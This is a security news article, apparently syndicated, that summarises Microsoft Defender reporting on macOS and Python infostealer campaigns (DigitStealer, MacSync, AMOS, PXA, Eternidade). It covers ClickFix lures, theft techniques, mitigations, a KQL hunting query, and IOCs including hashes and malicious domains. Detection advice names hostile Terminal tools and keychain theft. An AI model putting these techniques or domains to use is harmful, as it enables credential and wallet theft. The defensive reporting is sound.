By rssfeeds-admin 
Since late 2025, Microsoft Defender Experts spotted macOS campaigns with fake sites, ClickFix tricks, and bad DMG files.
These drop stealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). The malware runs without files, taps macOS tools, and grabs browser data, keychains, and dev secrets via AppleScript.
Python stealers help attackers tweak code quickly for any OS. Others hijack WhatsApp and PDF tools to push malware like Eternidade Stealer, targeting bank logins and crypto wallets. Stolen info leads to account hacks, money loss, and business breaches.
macOS Tricks, Python Phishing, and App Abuse
Mac users face fake Google Ads and sites pushing bad downloads or Terminal commands. ClickFix scams make victims paste code that installs DigitStealer (via fake DynamicLake apps), MacSync (Terminal pastes), or AMOS (AI tool fakes).
All three snag browser passwords, crypto wallets, cloud keys, and dev tokens, then zip and send data to attacker servers before cleanup.
Python stealers like PXA surged in 2025, tied to Vietnamese actors hitting governments via phishing. They use Telegram for C2, obfuscated scripts, DLL sideloading, and fake svchost.exe processes.
Campaigns in October and December set persistence with Run keys or tasks, exfil data via Telegram.
Attackers abuse WhatsApp for worm-like spread. A November 2025 campaign starts with VBS dropping batch files and PowerShell.
It grabs contacts, sends bad messages, and drops Eternidade Stealer via MSI. This Delphi tool watches for bank sites like Bradesco, Binance, and MetaMask.
A September Crystal PDF scam used malvertising. The fake editor sets scheduled tasks, steals Chrome/Firefox cookies and sessions from AppData.
Mitigations, Detections, and IOCs
Block these with user training on fake installers and Terminal risks. Watch Terminal for curl, base64, gunzip, osascript. Flag Keychain access, ZIPs in /tmp, odd POSTs to new domains.
Use Microsoft Defender XDR: cloud protection, EDR block mode, network/web guards, SmartScreen, auto-remediation, tamper protection. Attack surface rules block obfuscated scripts, untrusted executables, JS/VBS downloads.
Defender spots execution (PowerShell curls, osascript), persistence (Run keys, LaunchAgents), evasion (DLL side-loading, certutil), credential grabs, discovery (WMI/Python), C2, collection (ZIPs), exfil (curl).
Hunt with queries like these for DigitStealer:
// Suspicious DMG mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'Similar KQL for MacSync curls, AMOS mounts, PXA svchost.exe, WhatsApp VBS drops, CrystalPDF tasks.
Key IOCs (samples):
| Indicator | Type | Description |
|---|---|---|
| 3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a | SHA-256 | DigitStealer payload |
| 42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417 | SHA-256 | AMOS payload |
| 2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f | SHA-256 | WhatsApp campaign |
| 598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb | SHA-256 | Crystal PDF payload |
| dynamiclake[.]org | Domain | DigitStealer delivery |
| barbermoo[.]coupons | Domain | MacSync C2 |
| alli-ai[.]pro | Domain | AMOS redirect |
| bagumedios[.]cloud | Domain | PXA C2 |
Check Threat Analytics for MacSync and Crystal PDF intel. Organizations should scan now these cross-platform stealers blend in and evade old defenses.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.